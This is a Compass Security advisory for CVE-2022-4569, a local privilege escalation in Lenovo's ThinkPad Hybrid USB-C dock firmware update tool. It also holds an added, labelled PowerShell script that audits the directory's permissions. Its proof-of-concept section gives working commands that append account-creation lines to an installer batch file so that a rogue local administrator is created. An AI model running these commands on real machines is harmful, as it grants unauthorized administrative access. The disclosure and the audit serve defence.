#############################################################
#
# COMPASS SECURITY ADVISORY
# https://www.compass-security.com/research/advisories/
#
#############################################################
#
# Product:  ThinkPad Hybrid USB-C with USB-A Dock Firmware Update Tool
# Vendor:   Lenovo
# URL:      https://support.lenovo.com/us/en/product_security/LEN-103544
# CSNC ID:  CSNC-2022-16
# CVE ID:   CVE-2022-4569
# Subject:  Local Privilege Escalation
# Risk:     High
# Effect:   Locally exploitable
# Author:   info@compass-security.com
# Date:     14.10.2022
#
#############################################################

Introduction
------------

ThinkPad Hybrid USB-C with USB-A Dock is a docking station for ThinkPad laptops. The docking station comes with an optional driver, which is installable from the Lenovo System Update application.[1]

Compass Security identified a local privilege escalation vulnerability that allows regular users on a system where the ThinkPad Hybrid USB-C with USB-A Dock Driver is installed, or is installable via Lenovo System Update, to escalate their privileges to local administrator.

Affected
--------

Vulnerable:
* ThinkPad Hybrid USB-C with USB-A Dock Firmware Update Tool prior to V1.0.35_v2

Tested versions:
* ThinkPad Hybrid USB-C with USB-A Dock Firmware Update Tool V1.0.33
* ThinkPad Hybrid USB-C with USB-A Dock Firmware Update Tool V1.0.34
* ThinkPad Hybrid USB-C with USB-A Dock Firmware Update Tool V1.0.35

Not vulnerable:
* ThinkPad Hybrid USB-C with USB-A Dock Firmware V1.0.35_v2

Tested on:
* Windows 10 21H2 (OS Build 19044.2075)
* Windows 10 21H2 (OS Build 19044.2130)

Technical Description
---------------------

Lenovo System Update installs the ThinkPad Hybrid USB-C with USB-A Dock Firmware Update Tool under the following directory:

`C:\DRIVERS\ThinkPad_Hybrid_USB-C_With_USB-A_Dock_MFG_Driver_V1.0.0.15`

Under a default Windows installation, the Authenticated Users group has Modify permissions on the whole directory.
Therefore, regular users may modify any file within the directory.

During the update process via Lenovo System Update, a temporary administrative user `lenovo_tmp_` with a random name suffix is created. When the driver in question is installed, the following command is run from a temporary process created by that administrative user:

`cmd.exe /C "c:\DRIVERS\ThinkPad_Hybrid_USB-C_With_USB-A_Dock_MFG_Driver_V1.0.0.15\DriverInstallerScript.bat" /silent`

Proof of Concept
----------------

The exploitation of the vulnerability consists of the following steps:

1. Modify the driver directory. For example, `DriverInstallerScript.bat` may be modified, or DLL files may be placed so that they are loaded by the driver. Alternatively, an executable may be replaced, or a DLL may be placed in the directory in question so that an existing Lenovo executable loads it from there.
2. Run Lenovo System Update.

The following PowerShell commands, for example, add a user:

```
echo "net user /add InsertedUser Password.123!!!" >> "C:\DRIVERS\ThinkPad_Hybrid_USB-C_With_USB-A_Dock_MFG_Driver_V1.0.0.15\DriverInstallerScript.bat"
echo "net localgroup Administrators InsertedUser /add" >> "C:\DRIVERS\ThinkPad_Hybrid_USB-C_With_USB-A_Dock_MFG_Driver_V1.0.0.15\DriverInstallerScript.bat"
PS C:\Program Files (x86)\Lenovo\System Update> .\ConfigService.exe start
PS C:\Program Files (x86)\Lenovo\System Update> .\TvsuCommandLauncher.exe 5
```

Workaround / Fix
----------------

Either ensure that the ACLs of the directory are set as restrictively as possible when the directory is created, or move the directory to a location where regular users inherently have no access.
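The root cause is a directory writable by every authenticated user that is later executed from by an administrative account. The following PowerShell audit, added here as an example and not part of the Compass Security advisory or of any Lenovo tooling, reads the ACL of the driver directory named above and reports any Allow entry that grants write-capable rights to a broad principal. The directory path is the one from the advisory; the list of "broad" principals and the choice of rights treated as write-capable are this example's own assumptions.

```powershell
# Added example (not from the advisory): audit the driver directory for ACEs
# that let regular users modify its contents, which is the condition the
# advisory describes. Run in an elevated or normal PowerShell on the host.

# Path taken from the advisory.
$DriverDir = 'C:\DRIVERS\ThinkPad_Hybrid_USB-C_With_USB-A_Dock_MFG_Driver_V1.0.0.15'

# Principals that every interactive user effectively belongs to (assumed list).
$BroadPrincipals = @(
    'NT AUTHORITY\Authenticated Users',
    'BUILTIN\Users',
    'Everyone'
)

# Rights that allow adding, changing or replacing files in the directory.
$SpecificWriteRights = [System.Security.AccessControl.FileSystemRights]::Modify -bor
                       [System.Security.AccessControl.FileSystemRights]::Write -bor
                       [System.Security.AccessControl.FileSystemRights]::WriteData -bor
                       [System.Security.AccessControl.FileSystemRights]::AppendData -bor
                       [System.Security.AccessControl.FileSystemRights]::Delete -bor
                       [System.Security.AccessControl.FileSystemRights]::ChangePermissions -bor
                       [System.Security.AccessControl.FileSystemRights]::TakeOwnership

# Inherited ACEs are sometimes reported with generic access masks instead of
# the named FileSystemRights values; include GENERIC_WRITE and GENERIC_ALL so
# those entries are not missed.
$GenericWrite = 0x40000000
$GenericAll   = 0x10000000
$WriteMask    = [int]$SpecificWriteRights -bor $GenericWrite -bor $GenericAll

function Get-WeakDirectoryAces {
    param([Parameter(Mandatory)][string]$Path)

    if (-not (Test-Path -LiteralPath $Path -PathType Container)) {
        Write-Warning "Directory not present: $Path"
        return @()
    }

    $acl = Get-Acl -LiteralPath $Path
    $acl.Access | Where-Object {
        $_.AccessControlType -eq 'Allow' -and
        $BroadPrincipals -contains $_.IdentityReference.Value -and
        (([int]$_.FileSystemRights -band $WriteMask) -ne 0)
    } | ForEach-Object {
        [pscustomobject]@{
            Path      = $Path
            Principal = $_.IdentityReference.Value
            Rights    = $_.FileSystemRights
            Inherited = $_.IsInherited
        }
    }
}

$weak = @(Get-WeakDirectoryAces -Path $DriverDir)
if ($weak.Count -eq 0) {
    Write-Output "OK: no write-capable ACE for broad principals on $DriverDir"
} else {
    Write-Output "WEAK: the following ACEs allow regular users to modify $DriverDir"
    $weak | Format-Table -AutoSize
}
```

A WEAK result on a host running a Firmware Update Tool version earlier than V1.0.35_v2 indicates the vulnerable configuration; the fix is the vendor's updated version, and the same check can be pointed at any other directory that privileged installers execute from by changing `$DriverDir`.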
Timeline
--------

2022-10-10: Discovery by Compass Security
2022-10-14: Initial vendor notification
2022-10-17: Initial vendor response
2023-05-09: Release of fixed version / patch
2023-05-09: Coordinated public disclosure date

References
----------

[1] https://support.lenovo.com/us/en/solutions/pd500180-thinkpad-hybrid-usb-c-with-usb-a-dock-overview-and-service-parts